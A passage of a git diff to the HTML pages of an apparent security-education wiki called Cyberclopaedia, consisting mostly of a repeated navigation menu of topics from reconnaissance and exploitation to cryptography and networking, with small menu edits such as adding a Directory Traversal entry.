      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -402,22 +402,6 @@

ELF Ide - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/index.html b/docs/Reverse Engineering/Binary Formats/ELF/index.html index e73d481e..b59db7f4 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/index.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -187,22 +187,6 @@

File Types

- - diff --git a/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html b/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html index f055ff7a..663e5566 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html +++ b/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
